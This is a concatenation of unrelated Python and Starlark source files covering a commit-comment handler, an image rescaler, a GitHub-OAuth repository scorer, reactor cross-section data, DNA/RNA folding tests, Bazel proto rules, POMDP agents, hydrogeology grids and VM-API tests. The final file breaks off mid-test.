return request.redirect("/%s/commit/%s#%s" %
(self.proj_name, ref, new_comment.uid))
def _q_lookup(self, request, comment_id):
if request.method == 'DELETE':
# FIXME: no need to verify the user here?
ok = Comment.delete(comment_id)
if not ok:
raise TraversalError(
"Unable to delete comment %s" % comment_id)
return ''
return "Display comment %s TODO" % comment_id
|
import cv2
class Rescale(object):
"""Rescale the image in a sample to a given size.
Args:
output_size (tuple or int): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image, key_pts = sample['image'], sample['keypoints']
h, w = image.shape[:2]
if isinstance(self.output_size, int):
if h > w:
new_h, new_w = self.output_size * h / w, self.output_size
else:
new_h, new_w = self.output_size, self.output_size * w / h
else:
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
img = cv2.resize(image, (new_w, new_h))
# scale the pts, too
key_pts = key_pts * [new_w / w, new_h / h]
return {'image': img, 'keypoints': key_pts}
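# Example usage sketch (the image path and target size are hypothetical):
#
#   sample = {'image': cv2.imread('face.png'), 'keypoints': pts}  # pts: Nx2 array
#   rescaled = Rescale(224)(sample)  # shorter image edge becomes 224 px;
#                                    # keypoints are scaled by the same factors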
|
try:
from flask import Flask, render_template, url_for, request, redirect, make_response
import random
import json
import os
from time import time
from flask_dance.contrib.github import make_github_blueprint, github
from getGithubData import Github
from constable import Constable
from badge import Badge
except Exception as e:
print("Some Modules are Missing {}".format(e))
app = Flask(__name__)
app.config["SECRET_KEY"] = os.environ['secret_key']
github_blueprint = make_github_blueprint(client_id=os.environ['client_id'],
client_secret=os.environ['client_secret'])
app.register_blueprint(github_blueprint, url_prefix='/github_login')
@app.route('/')
def github_login():
if not github.authorized:
return redirect(url_for('github.login'))
else:
account_info = github.get('/user')
if account_info.ok:
account_data = account_info.json()
user = account_data['login']
return render_template('index.html', title='Welcome', user=user)
return '<h1>Request failed!</h1>'
@app.route('/get_score')
def get_score():
repo_name = request.args.get('repo')
account_info = github.get('/user')
account_data = account_info.json()
owner = account_data['login']
github_gql = Github(github.access_token)
constable = Constable(repo_name, owner, github_gql)
score = constable.get_score()
print(score)
grade = constable.get_grade(score['total_score'])
branch = 'master'
key = '{}/{}/{}'.format(owner, repo_name, branch)
badge = Badge(key).get_shield_url(grade=grade)
return {"score": score, "grade": grade, "badge": badge}
@app.route('/check_repo')
def check_valid_repo():
repo_name = request.args.get('repo')
if github.authorized:
github_gql = Github(github.access_token)
valid = github_gql.check_valid_repo(repo_name)
else:
valid = False
return {"valid": valid}
|
"""
This file writes all of the materials data (multi-group nuclear
cross-sections) for the LRA diffusion
benchmark problem to an HDF5 file. The script uses the h5py Python package
to interact with the HDF5 file format. This may be a good example for those
wishing to write their nuclear data to an HDF5 file to import using the
OpenMOC 'materialize' Python module.
"""
# Create a Python dictionary to store LRA multi-group cross-sections
dataset = {}
dataset['Energy Groups'] = 2
dataset['Delayed Groups'] = 2
dataset['Materials'] = {}
lra_materials = dataset['Materials']
###############################################################################
################################ region 1 ################################
###############################################################################
# Create a subdictionary for region 1 material data
lra_materials['region_1'] = {}
lra_materials['region_1']['Absorption XS'] = [0.008252, 0.1003]
lra_materials['region_1']['Total XS'] = [0.2656, 1.5798]
lra_materials['region_1']['Scattering XS'] = [0.231892, 0.02533, 0.00, 1.47948]
lra_materials['region_1']['Fission XS'] = [0.002, 0.05]
lra_materials['region_1']['Nu Fission XS'] = [0.004602, 0.1091]
lra_materials['region_1']['Chi'] = [1.0, 0.0]
lra_materials['region_1']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_1']['Velocity'] = [3e7, 3e5]
lra_materials['region_1']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 2 ################################
###############################################################################
# Create a subdictionary for region 2 material data
lra_materials['region_2'] = {}
lra_materials['region_2']['Absorption XS'] = [0.007181, 0.07047]
lra_materials['region_2']['Total XS'] = [0.2629, 1.7525]
lra_materials['region_2']['Scattering XS'] = [0.22792, 0.02767, 0.00, 1.68201]
lra_materials['region_2']['Fission XS'] = [0.002, 0.045]
lra_materials['region_2']['Nu Fission XS'] = [0.004609, 0.08675]
lra_materials['region_2']['Chi'] = [1.0, 0.0]
lra_materials['region_2']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_2']['Velocity'] = [3e7, 3e5]
lra_materials['region_2']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 3 ################################
###############################################################################
# Create a subdictionary for region 3 material data
lra_materials['region_3'] = {}
lra_materials['region_3']['Absorption XS'] = [0.008002, 0.08344]
lra_materials['region_3']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_3']['Scattering XS'] = [0.230502, 0.02617, 0.00, 1.510639]
lra_materials['region_3']['Fission XS'] = [0.002, 0.045]
lra_materials['region_3']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_3']['Chi'] = [1.0, 0.0]
lra_materials['region_3']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_3']['Velocity'] = [3e7, 3e5]
lra_materials['region_3']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 4 ################################
###############################################################################
# Create a subdictionary for region 4 material data
lra_materials['region_4'] = {}
lra_materials['region_4']['Absorption XS'] = [0.008002, 0.073324]
lra_materials['region_4']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_4']['Scattering XS'] = [0.230462, 0.02617, 0.00, 1.520789]
lra_materials['region_4']['Fission XS'] = [0.002, 0.045]
lra_materials['region_4']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_4']['Chi'] = [1.0, 0.0]
lra_materials['region_4']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_4']['Velocity'] = [3e7, 3e5]
lra_materials['region_4']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 5 ################################
###############################################################################
# Create a subdictionary for region 5 material data
lra_materials['region_5'] = {}
lra_materials['region_5']['Absorption XS'] = [0.008002, 0.08344]
lra_materials['region_5']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_5']['Scattering XS'] = [0.230462, 0.02617, 0.00, 1.510672]
lra_materials['region_5']['Fission XS'] = [0.002, 0.045]
lra_materials['region_5']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_5']['Chi'] = [1.0, 0.0]
lra_materials['region_5']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_5']['Velocity'] = [3e7, 3e5]
lra_materials['region_5']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 6 ################################
###############################################################################
# Create a subdictionary for region 6 material data
lra_materials['region_6'] = {}
lra_materials['region_6']['Absorption XS'] = [0.0006034, 0.01911]
lra_materials['region_6']['Total XS'] = [0.2652, 2.0938]
lra_materials['region_6']['Scattering XS'] = [0.216931, 0.04754, 0.00, 2.074676]
lra_materials['region_6']['Fission XS'] = [0.0, 0.0]
lra_materials['region_6']['Nu Fission XS'] = [0.0, 0.0]
lra_materials['region_6']['Chi'] = [1.0, 0.0]
lra_materials['region_6']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_6']['Velocity'] = [3e7, 3e5]
lra_materials['region_6']['Delayed Fraction'] = [0.0054, 0.001087]
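# The module docstring says this data is written to an HDF5 file with h5py,
# but no write step appears above. A minimal sketch of how that could be done
# follows (the output filename and group layout are assumptions, not taken
# from this file):
import h5py

with h5py.File('LRA-materials-data.h5', 'w') as f:
    # Store the scalar metadata as file attributes
    f.attrs['Energy Groups'] = dataset['Energy Groups']
    f.attrs['Delayed Groups'] = dataset['Delayed Groups']
    # One group per region, one dataset per cross-section array
    material_group = f.create_group('Materials')
    for region_name, xs_dict in lra_materials.items():
        region = material_group.create_group(region_name)
        for xs_name, xs_values in xs_dict.items():
            region.create_dataset(xs_name, data=xs_values)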
|
"""Test DNA/RNA folding."""
from os import path
from time import time
import unittest
from seqfold import dg, dg_cache, fold, Cache, Struct
from seqfold.dna import DNA_ENERGIES
from seqfold.rna import RNA_ENERGIES
from seqfold.fold import (
STRUCT_DEFAULT,
_traceback,
_bulge,
_stack,
_hairpin,
_internal_loop,
_pair,
_w,
Structs,
)
class TestFold(unittest.TestCase):
"""Test folding functions"""
def test_fold(self):
"""Fold function."""
# it should throw if a nonsense sequence is provided
with self.assertRaises(RuntimeError):
dg("EASFEASFAST", 37.0)
# Both U and T, mix of RNA and DNA
with self.assertRaises(RuntimeError):
dg("ATGCATGACGATUU", 37.0)
# should not throw
dg("ATGGATTTAGATAGAT")
def test_fold_cache(self):
"""Gather a cache of the folded structure."""
seq = "ATGGATTTAGATAGAT"
cache = dg_cache(seq)
seq_dg = dg(seq)
self.assertAlmostEqual(seq_dg, cache[0][len(seq) - 1], delta=1)
def test_fold_dna(self):
"""DNA folding to find min energy secondary structure."""
# unafold's estimates for free energy estimates of DNA oligos
unafold_dgs = {
"GGGAGGTCGTTACATCTGGGTAACACCGGTACTGATCCGGTGACCTCCC": -10.94, # three branched structure
"GGGAGGTCGCTCCAGCTGGGAGGAGCGTTGGGGGTATATACCCCCAACACCGGTACTGATCCGGTGACCTCCC": -23.4, # four branched structure
"CGCAGGGAUACCCGCG": -3.8,
"TAGCTCAGCTGGGAGAGCGCCTGCTTTGCACGCAGGAGGT": -6.85,
"GGGGGCATAGCTCAGCTGGGAGAGCGCCTGCTTTGCACGCAGGAGGTCTGCGGTTCGATCCCGCGCGCTCCCACCA": -15.50,
"TGAGACGGAAGGGGATGATTGTCCCCTTCCGTCTCA": -18.10,
"ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA": -3.65,
}
for seq, ufold in unafold_dgs.items():
d = dg(seq, temp=37.0)
# accepting a 60% difference
delta = abs(0.6 * min(d, ufold))
self.assertAlmostEqual(d, ufold, delta=delta)
def test_fold_rna(self):
"""RNA folding to find min energy secondary structure."""
# unafold's estimates for free energy estimates of RNA oligos
# most tests available at https://github.com/jaswindersingh2/SPOT-RNA/blob/master/sample_inputs/batch_seq.fasta
unafold_dgs = {
"ACCCCCUCCUUCCUUGGAUCAAGGGGCUCAA": -9.5,
"AAGGGGUUGGUCGCCUCGACUAAGCGGCUUGGAAUUCC": -10.1,
"UUGGAGUACACAACCUGUACACUCUUUC": -4.3,
"AGGGAAAAUCCC": -3.3,
"GCUUACGAGCAAGUUAAGCAAC": -4.6,
"UGGGAGGUCGUCUAACGGUAGGACGGCGGACUCUGGAUCCGCUGGUGGAGGUUCGAGUCCUCCCCUCCCAGCCA": -32.8,
"GGGCGAUGAGGCCCGCCCAAACUGCCCUGAAAAGGGCUGAUGGCCUCUACUG": -20.7,
"GGGGGCAUAGCUCAGCUGGGAGAGCGCCUGCUUUGCACGCAGGAGGUCUGCGGUUCGAUCCCGCGCGCUCCCACCA": -31.4,
}
for seq, ufold in unafold_dgs.items():
d = dg(seq, temp=37.0)
# accepting a 50% difference
delta = abs(0.5 * min(d, ufold))
self.assertAlmostEqual(d, ufold, delta=delta)
def test_multibranch(self):
"""Fold a multibranch structure."""
seq = "GGGAGGTCGTTACATCTGGGTAACACCGGTACTGATCCGGTGACCTCCC" # three branch
structs = fold(seq)
self.assertTrue(
any("BIFURCATION" in s.desc and (7, 41) in s.ij for s in structs)
)
def test_pair(self):
"""Create a pair for stack checking."""
seq = "ATGGAATAGTG"
self.assertEqual(_pair(seq, 0, 1, 9, 10), "AT/TG")
def test_stack(self):
"""Calc delta G of a stack."""
seq = "GCUCAGCUGGGAGAGC"
temp = 310.15
self.assertAlmostEqual(
_stack(seq, 1, 2, 14, 13, temp, RNA_ENERGIES), -2.1, delta=0.1
)
def test_bulge(self):
"""Calc delta G calc of a bulge."""
# mock bulge of CAT on one side and AG on other
# from pg 429 of SantaLucia, 2004
seq = "ACCCCCATCCTTCCTTGAGTCAAGGGGCTCAA"
pair_dg = _bulge(seq, 5, 7, 18, 17, 310.15, DNA_ENERGIES)
self.assertAlmostEqual(3.22, pair_dg, delta=0.4)
def test_hairpin(self):
"""Calc delta G of a hairpin structure."""
# hairpin = "CCTTGG"
seq = "ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 11
j = 16
temp = 310.15
hairpin_dg = _hairpin(seq, i, j, temp, DNA_ENERGIES)
# this differs from Unafold
self.assertAlmostEqual(hairpin_dg, 4.3, delta=1.0)
# from page 428 of SantaLucia, 2004
# hairpin = "CGCAAG"
seq = "ACCCGCAAGCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 3
j = 8
hairpin_dg = _hairpin(seq, i, j, temp, DNA_ENERGIES)
self.assertAlmostEqual(0.67, hairpin_dg, delta=0.1)
seq = "CUUUGCACG"
i = 0
j = 8
hairpin_dg = _hairpin(seq, i, j, temp, RNA_ENERGIES)
self.assertAlmostEqual(4.5, hairpin_dg, delta=0.2)
def test_internal_loop(self):
"""Calc dg of an internal loop."""
seq = "ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA"
i = 6
j = 21
temp = 310.15
dg = _internal_loop(seq, i, i + 4, j, j - 4, temp, DNA_ENERGIES)
self.assertAlmostEqual(dg, 3.5, delta=0.1)
def test_w(self):
"""Calculate _w over some range."""
seq = "GCUCAGCUGGGAGAGC"
i = 0
j = 15
temp = 310.15
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -3.8, delta=0.2)
seq = "CCUGCUUUGCACGCAGG"
i = 0
j = 16
temp = 310.15
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -6.4, delta=0.2)
seq = "GCGGUUCGAUCCCGC"
i = 0
j = 14
v_cache = []
w_cache = []
for _ in range(len(seq)):
v_cache.append([STRUCT_DEFAULT] * len(seq))
w_cache.append([STRUCT_DEFAULT] * len(seq))
struct = _w(seq, i, j, temp, v_cache, w_cache, RNA_ENERGIES)
self.assertAlmostEqual(struct.e, -4.2, delta=0.2)
def _debug(self, cache: Structs):
"""Log the contents of a Cache."""
rows = []
for row in cache:
rows.append(
",".join(str(s.ij).replace(",", "-") if s else "." for s in row)
)
rows.append("")
for row in cache:
rows.append(",".join(str(s.e) if s else "." for s in row))
rows.append("")
for row in cache:
rows.append(",".join(str(s.desc) if s else "." for s in row))
print("\n".join(rows))
|
load("@rules_proto//proto:defs.bzl", "ProtoInfo")
load(
"@io_bazel_rules_scala//scala_proto/private:scala_proto_aspect_provider.bzl",
"ScalaProtoAspectInfo",
)
load(
"@io_bazel_rules_scala//scala/private:phases/api.bzl",
"extras_phases",
"run_phases",
)
load("@bazel_skylib//lib:dicts.bzl", "dicts")
load("//scala_proto/private:scala_proto_aspect.bzl", "make_scala_proto_aspect")
def phase_merge_aspect_java_info(ctx, p):
java_info = java_common.merge([dep[ScalaProtoAspectInfo].java_info for dep in ctx.attr.deps])
return struct(
java_info = java_info,
external_providers = {
"JavaInfo": java_info,
},
)
def phase_default_info(ctx, p):
java_info = p.merge_aspects.java_info
return struct(
external_providers = {
"DefaultInfo": DefaultInfo(
files = depset(
java_info.source_jars,
transitive = [java_info.full_compile_jars],
),
),
},
)
def _scala_proto_library(ctx):
return run_phases(
ctx,
[
("merge_aspects", phase_merge_aspect_java_info),
("default_info", phase_default_info),
],
)
scala_proto_aspect = make_scala_proto_aspect()
def make_scala_proto_library(*extras, aspects = [scala_proto_aspect]):
attrs = {
"deps": attr.label_list(providers = [ProtoInfo], aspects = aspects),
}
return rule(
implementation = _scala_proto_library,
attrs = dicts.add(
attrs,
extras_phases(extras),
*[extra["attrs"] for extra in extras if "attrs" in extra]
),
fragments = ["java"],
provides = [DefaultInfo, JavaInfo],
)
scala_proto_library = make_scala_proto_library(
aspects = [
scala_proto_aspect,
],
)
|
from .data_augment import PairRandomCrop, PairCompose, PairRandomHorizontalFilp, PairToTensor
from .data_load import train_dataloader, test_dataloader, valid_dataloader
|
import argparse
from yaaf import Timestep
from openmdp.agents import QMDPAgent, MLSAgent, OptimalMDPPolicyAgent
from openmdp.scenarios import DuoNavigationPOMDP
def run(agent, pomdp, horizon, render=False):
fully_observable = agent.name == "Optimal MDP Policy"
state = pomdp.reset()
if not fully_observable:
agent.reset()
for step in range(horizon):
action = agent.action(state) if fully_observable else agent.action()
next_obs, reward, _, info = pomdp.step(action)
terminal = reward == 0.0
next_state = pomdp.state
timestep = Timestep(state, action, reward, next_state, terminal, info) if fully_observable else Timestep(None, action, reward, next_obs, terminal, info)
agent.reinforcement(timestep)
if render:
print(f"\n##########\nTimestep {step}\n##########\n")
pomdp.render()
print(f"State: {state} (y={pomdp.state_index(state)})")
print(f"Action: {pomdp.action_meanings[action]} (a={action})")
print(f"Next state: {next_state} (y={pomdp.state_index(next_state)})")
print(f"Next obs: {next_obs} (z={pomdp.observation_index(next_obs)})")
print(f"Reward: {reward}")
state = next_state
if terminal: break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("agent", type=str, choices=["MLSAgent", "QMDPAgent", "ValueIteration"])
parser.add_argument("--horizon", default=10, type=int)
parser.add_argument("--render", action="store_true")
opt = parser.parse_args()
pomdp = DuoNavigationPOMDP()
if opt.agent == "MLSAgent": agent = MLSAgent(pomdp)
elif opt.agent == "ValueIteration": agent = OptimalMDPPolicyAgent(pomdp)
elif opt.agent == "QMDPAgent": agent = QMDPAgent(pomdp)
else: raise ValueError("Unreachable exception due to choices=[...] on argparse")
run(agent, pomdp, opt.horizon, opt.render)
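# Example invocation of this script (the file name run_duo_navigation.py is hypothetical):
#   python run_duo_navigation.py QMDPAgent --horizon 20 --render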
|
"""
The MIT License (MIT)
Copyright (c) 2017 Marvin Teichmann
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import numpy as np
import scipy as scp
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO,
stream=sys.stdout)
from pyvision.datasets import pascal
from pyvision.datasets.pascal import input_producer as pinput
def _assert_data_dir():
try:
os.environ['TV_DIR_DATA']
return True
except KeyError:
logging.warning("Data dir not given. Skipping all dataset tests.")
logging.info("Set $TV_DIR_DATA to perform additional tests.")
return False
def test_pascal():
conf = pinput.default_conf()
if not _assert_data_dir():
        return  # TV_DIR_DATA is not set; skip the test
if not os.path.exists(os.environ['TV_DIR_DATA'] + "/VOC2012"):
logging.warning("Dir: {} does not exist."
.format(os.environ['TV_DIR_DATA'] + "/VOC2012"))
logging.info("Skipping pascal voc test.")
test = pinput.InputProducer(conf)
next(test)
if __name__ == '__main__':
logging.info("Hello World.")
|
class WellGrid:
"""Square grid class with regular spacing and well at grid center.
The default WellGrid object has radius gr=100 defining the square's
extent and grid density gd=21. An exception occurs if the grid radius is
not positive. Grid density defines the numbers of rows and columns
comprising the grid; thus, the default grid has 21 rows x 21 cols = 441
grid points. Minimum grid density is constrained to 11 (121 grid points)
and maximum grid density is constrained to 41 (1681 grid points). Values
    for gd outside of these constraints are re-set to the minimum or maximum
values as appropriate.
    The .pts property returns the grid point attributes including local
x-y coordinates, world x-y coordinates and radius values relative to the
well location. The .info method displays grid information and the .draw
method displays a plot of the grid in either local or world coordinates.
Attributes:
gr (float) : Radius defining the extent of the solution grid (units L,
default 100.0).
gd (int) : Grid density defining the number of rows and columns;
minimum and maximum constraints are enforced (default 21).
"""
from .wells import SteadyWell
def __init__(self, well=SteadyWell(), gr=100, gd=21):
self.well = well
self.gr = gr
self.gd = gd
self.max_gd = 41
self.min_gd = 11
@property
def gr(self):
"""float : Grid radius.
Setter method checks for valid values and triggers an exception if
invalid values are specified.
"""
return self._gr
@gr.setter
def gr(self, v):
if not (v > 0):
raise Exception('Grid radius must be greater than 0.')
self._gr = v
@property
def grdim(self):
"""int : Number of grid rows and columns."""
if self.gd < self.min_gd:
return self.min_gd
elif self.gd > self.max_gd:
return self.max_gd
else:
return int(self.gd)
@property
def npts(self):
"""int : Number of grid points."""
return self.grdim**2
@property
def pts(self):
"""pandas dataframe : grid point attriubutes including local grid
point coordinates, world grid point coordinates and radius values of
grid points relative to the well center.
"""
import pandas
import numpy
from pygaf.utils import add_constant_to_list
df = pandas.DataFrame()
row = list(numpy.linspace(-self.gr, self.gr, self.grdim))
rows = [row for _ in range(self.grdim)]
cols = [[row[i] for _ in range(self.grdim)] for i in range(self.grdim)]
df['locx'] = list(numpy.array(rows).flat)
df['locy'] = list(numpy.array(cols).flat)
df['worldx'] = add_constant_to_list(list(df.locx), self.well.x)
df['worldy'] = add_constant_to_list(list(df.locy), self.well.y)
df['rad'] = numpy.sqrt(df.locx**2 + df.locy**2)
return df
def info(self):
"""Print the well grid information."""
print('WELL GRID INFORMATION')
print('---------------------')
if self.npts == self.min_gd**2:
print('Notice! grid spacing has been increased to enforce the',
'minimum grid density of', self.min_gd**2, 'points.')
if self.npts == self.max_gd**2:
print('Notice! grid spacing has been decreased to enforce the',
'maximum grid density of', self.max_gd**2, 'points.')
print('Grid radius:', round(self.gr, 1))
print('Number of grid points:', self.npts)
print('Grid density:', self.grdim)
print()
return
def draw(self, local=False):
"""Draw the grid points.
Args:
local (bool) : Display the grid plot in local coordinates with
                the well at 0, 0 (default False).
"""
from matplotlib import pyplot as plt
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
if local:
x, y = list(self.pts.locx), list(self.pts.locy)
cx, cy = 0, 0
title = 'Well Grid in Local Coordinates'
else:
x, y = list(self.pts.worldx), list(self.pts.worldy)
cx, cy = self.well.x, self.well.y
title = 'Well Grid'
ax.plot(x, y, '.', markersize=1, c='black')
ax.plot(cx, cy, '.', c='red')
ax.set_title(title)
ax.axis('equal')
plt.show()
return
class BasinGrid:
""" Square grid class with basin center at grid center.
The default BasinGrid object has radius gr=100 defining the square's extent
and grid density gd=21. An exception occurs if the grid radius is not
positive. Grid density defines the numbers of rows and columns comprising
the grid; thus, the default grid has 21 rows x 21 cols = 441 grid points.
Minimum grid density is constrained to 11 (121 grid points) and maximum
grid density is constrained to 41 (1681 grid points). Values for gd outside
    of these constraints are re-set to the minimum or maximum values as
appropriate.
    The .pts property returns the grid point attributes including local
x-y coordinates and world x-y coordinates. The .info method displays grid
information and the .draw method displays a plot of the grid in either
local or world coordinates.
Attributes:
gr (float) : Radius defining the extent of the solution grid (units L,
default 100.0).
gd (int) : Grid density defining the number of rows and columns;
minimum and maximum constraints are enforced (default 21).
"""
from .basins import Basin
def __init__(self, basin=Basin(), gr=100, gd=21):
self.basin = basin
self.gr = gr
self.gd = gd
self.max_gd = 41
self.min_gd = 11
@property
def gr(self):
"""float : Grid radius.
Setter method checks for valid values and triggers an exception if
invalid values are specified.
"""
return self._gr
@gr.setter
def gr(self, v):
if not (v > 0):
raise Exception('Grid radius must be greater than 0.')
self._gr = v
@property
def grdim(self):
"""int : Number of grid rows and columns."""
if self.gd < self.min_gd:
return self.min_gd
elif self.gd > self.max_gd:
return self.max_gd
else:
return int(self.gd)
@property
def npts(self):
"""int : Number of grid points."""
return self.grdim**2
@property
def pts(self):
"""pandas dataframe : grid point attriubutes including local grid
point coordinates and world grid point coordinates.
"""
import pandas
import numpy
from pygaf.utils import add_constant_to_list
from pygaf.utils import rotate_grid
df = pandas.DataFrame()
row = list(numpy.linspace(-self.gr, self.gr, self.grdim))
rows = [row for _ in range(self.grdim)]
cols = [[row[i] for _ in range(self.grdim)] for i in range(self.grdim)]
df['locx'] = list(numpy.array(rows).flat)
df['locy'] = list(numpy.array(cols).flat)
df['rotx'], df['roty'] = rotate_grid(
0, 0, list(df.locx), list(df.locy), self.basin.rot_rad
)
df['worldx'] = add_constant_to_list(list(df.rotx), self.basin.cx)
df['worldy'] = add_constant_to_list(list(df.roty), self.basin.cy)
df['dx'] = list(df.locx)
df['dy'] = list(df.locy)
return df
def info(self):
"""Print the basin grid information."""
print('BASIN GRID INFORMATION')
print('----------------------')
if self.npts == self.min_gd**2:
print('Notice! grid spacing has been increased to enforce the',
'minimum grid density of', self.min_gd**2, 'points.')
if self.npts == self.max_gd**2:
print('Notice! grid spacing has been decreased to enforce the',
'maximum grid density of', self.max_gd**2, 'points.')
print('Grid radius:', round(self.gr, 1))
print('Number of grid points:', self.npts)
print('Grid density:', self.grdim)
print()
return
def draw(self, local=False):
"""Draw the grid points.
Args:
local (bool) : Display the grid plot in local coordinates with
the well at 0, 0 (default False).
"""
from matplotlib import pyplot as plt
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
if local:
x, y = list(self.pts.locx), list(self.pts.locy)
cx, cy = 0, 0
title = 'Basin Grid in Local Coordinates'
else:
x, y = list(self.pts.worldx), list(self.pts.worldy)
cx, cy = self.basin.cx, self.basin.cy
title = 'Basin Grid'
ax.plot(x, y, '.', markersize=1, c='black')
ax.plot(cx, cy, '.', c='red')
ax.set_title(title)
ax.axis('equal')
plt.show()
return
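# Illustrative usage sketch (an assumption, not part of the original module): it relies on this
# file living inside the pygaf package so that the .wells import above resolves, and the
# parameter values below are arbitrary demo choices.
if __name__ == '__main__':
    demo_grid = WellGrid(gr=150, gd=25)   # 25 x 25 = 625 points within +/-150 of the well
    demo_grid.info()                      # prints radius, number of points and density
    print(demo_grid.pts.head())           # locx/locy, worldx/worldy and rad columns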
|
"""Tests for VM actions called via WebTest
$ ~/eoscloud-venv/bin/python3 -m unittest eos_db.test.test_vm_actions_http
"""
import os
import unittest
from eos_db import server
from webtest import TestApp
from pyramid.paster import get_app
from http.cookiejar import DefaultCookiePolicy
# These states should be settable without any side-effects.
STATES_TO_TEST = [
'Starting',
'Stopping',
'Restarting',
'Pre_Deboosted',
'Deboosting',
'Started',
'Stopped',
'Prepared',
'Boosting',
]
# Depend on test.ini in the same dir as this file.
test_ini = os.path.join(os.path.dirname(__file__), 'test.ini')
class TestVMActionsHTTP(unittest.TestCase):
"""Tests API functions associated with VM actions.
Note that all tests are in-process, we don't actually start a HTTP server,
but we do communicate HTTP requests and responses.
Outside of setUp, all calls to the database should be via the HTTP API.
"""
def setUp(self):
"""Launch pserve using webtest with test settings"""
self.appconf = get_app(test_ini)
self.app = TestApp(self.appconf)
#For speed, allow cookie setting.
# self.app.cookiejar.set_policy(DefaultCookiePolicy(allowed_domains=[]))
# This sets global var "engine" - in the case of SQLite this is a fresh RAM
# DB each time. If we only did this on class instantiation the database would
# be dirty and one test could influence another.
# TODO - add a test that tests this.
server.choose_engine("SQLite")
# Punch in new administrator account with direct server call
# This will implicitly generate the tables.
user_id = server.create_user("administrators", "administrator", "administrator", "administrator")
#server.touch_to_add_user_group("administrator", "administrators")
server.touch_to_add_password(user_id, "adminpass")
self.app.authorization = ('Basic', ('administrator', 'adminpass'))
# This sorts out the auth token cookie.
self.app.get('/users')
self.app.authorization = None
"""VM-related API functions."""
def test_create_own_retrieve_servers(self): # FIX
""" Create a server. Ensure that a 200 OK response results.
Add an owner to a server. Ensure that a 200 OK response results.
A user can request a list of servers that they own. An
administrator can list all the servers. """
# Create user and server
self.create_user("testuser")
self.create_server("testserver")
# Add ownership
response = self.app.put('/servers/testserver/owner',
{'artifact_id': 'testserver',
'actor_id': 'bcollier'})
# Get server
response = self.app.get('/servers/testserver',
{'hostname': 'testserver'})
# Get server ownership - !! Not implemented
# FIXME
#
# response = self.app.get('/servers/testserver/owner',
# {'artifact_id': 'testserver'})
""" Server State-Change Functions. """
def test_server_states(self):
""" Check that a server appears in various states after using the
relevant API call. This also tests the function 'retrieve_servers_in_state'.
"""
# Create server
sid = self.create_server("testserver")
def get_state():
response = self.app.get('/servers/testserver/state')
return response.json
#All the states listed should simply add a touch and succeed without drama.
for state in STATES_TO_TEST:
res = self.app.post('/servers/testserver/' + state)
#print("Push result = " + str(res))
self.assertEqual(get_state(), state)
#Also confirm this works by ID
resp2 = self.app.get('/servers/by_id/%s/state' % sid)
self.assertEqual(resp2.json, STATES_TO_TEST[-1])
def test_retrieve_server(self):
""" Pull back details of our server by name. """
self.create_server("testserver") # Create server
# Retrieve server details
response = self.app.get('/servers/testserver',
{'hostname': 'testserver'})
def test_retrieve_server_by_id(self):
""" Our server will have ID 1. Check that we can retrieve details of
it.
"""
sid = self.create_server("testserver") # Create server
# Retrieve server details by name
self.assertEqual(sid, 1)
response = self.app.get('/servers/by_id/1')
# def test_update_server(self):
# """ Not currently implemented. """
#
# self.create_server("testserver") # Create server
# Update server details
# Check server details
# def test_delete_server(self):
# """ Not currently implemented. """
def test_set_get_server_specification(self):
""" Follows hard-coded rules for machine behaviour.
Set machine CPUs to 2. Check, should pass.
Set machine CPUs to 65000. Check, should fail.
Set machine RAM to 16. Check, should pass.
Set machine RAM to 65000. Check, should fail.
Check that machine RAM and Cores are 2 and 16 as above. """
self.create_server("testserver") # Create server
# Set server spec
response = self.app.post('/servers/testserver/specification',
{'name': 'testserver',
'cores': 2,
'ram': 16 },
status=200,
expect_errors=False)
response = self.app.post('/servers/testserver/specification',
{'name': 'testserver',
'cores': 65000,
'ram': 65000 },
status=400,
expect_errors=False)
# Get server spec
response = self.app.get('/servers/testserver/specification',
{'hostname': 'testserver'},
status=200,
expect_errors=False)
def test_retrieve_servers_by_state(self):
""" The agents need to find out about servers to be acted on.
Test for states/XXX
"""
app = self.app
self.create_server("testserver1")
self.create_server("testserver2")
app.post('/servers/testserver1/Stopping')
app.post('/servers/testserver2/Stopping')
res1 = app.get('/states/Stopping')
self.assertEqual(res1.json,
[{"artifact_id":1, "artifact_uuid":"testserver1", "artifact_name":"testserver1"},
